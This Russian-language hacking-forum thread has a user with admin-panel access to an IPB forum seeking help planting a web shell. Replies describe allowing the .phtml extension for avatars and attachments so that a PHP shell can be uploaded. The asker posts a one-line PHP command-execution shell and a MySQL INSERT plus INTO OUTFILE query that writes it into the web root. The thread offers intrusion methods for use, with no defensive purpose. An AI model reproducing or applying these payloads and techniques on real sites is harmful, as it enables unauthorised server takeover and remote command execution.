Честно и старательно провел 20 минут в поисках похожих тем, но ничего полезного не нашел.

Есть нормальный доступ к админской панели, нужно всего лишь залить шелл на сайт. Uploads доступен на запись, закачать в папку со смайлами удается, но прочитать - нет(АшиПка 500).

Я читал эту (http://antichat.ru/txt/IPB) статью, но тамошний вариант с подменой запроса не работает - файл не передается. Прошу помочь. Устроит любой вариант, главное - шелл залить.

Какой версии форум?

http://forum.antichat.ru/thread11551.html

to Barsik
ipb 1.3 final


to Green_Bear
Попробовал как ты написал. Результат:
запрещено загружать файлы такого типа, в качестве аватаров или фотографий

Ахтунг! В админке можно исполнять mysql команды. Знаю что можно с их помощью создать свой шелл, но в мускуле не разбираюсь. Прошу помочь.

Ахтунг! В админке можно исполнять mysql команды. Знаю что можно с их помощью создать свой шелл, но в мускуле не разбираюсь. Прошу помочь.Юзай поиск тема обсуждалась( into outfile)
Если вопрос не закрыт то иди сюда(лучшие доки) - http://dev.mysql.com/doc/

Делай так: Если форум IPB 2 0 4.

Зайди в Админку,

Системные настройки---->Главная конфигурация---->Профили пользователей---->Разрешенные расширения файлов для аватар.

Ставиш разширение phtml.

Это тоже самое что и php, потом идёш в Аттачи и делаеш тама ешё один тип-.phtml, тип пишем от пхп файлов, то есть application/octet-stream после всего это идёш и грузиш свой шелл , только с изменёным разширением в phtml, потом смотриш его свойства вот и всё, можна сказать я тебе на пальчиках всё обяснил,вчера темже способом Грин для меня шелл закинул.

Если я помог тебе не забудь про репутацию Грину и мне.

Респект Грину за выложеную инфу.

to Tem
Читай топ внимательнее.

to qBiN
Спасибо за инфу, но все равно пока не получается...

Значит прочел-таки я это (http://rst.void.ru/papers/sql-inj.txt) небольшое пособие. Как выяснилось - в мускуле сложных команд нету. Тем не менее залить шелл не удается.

Сначала я собственно создал значение в таблице юзеров:
INSERT INTO table (par1, par2) VALUES ('7777','<? system($_GET["cmd"]); ?> ')

Теперь инто файл хочу его залить:
SELECТ name FROM table INTO OUTFILE '/home/user/www/shell.php'

Но, увы, не получается. В ответ вижу следующее сообщение:

Access denied for user: 'forum@localhost' (Using password: YES)

Это означает что инто аутфайл запрещен? Какие тогда варианты есть?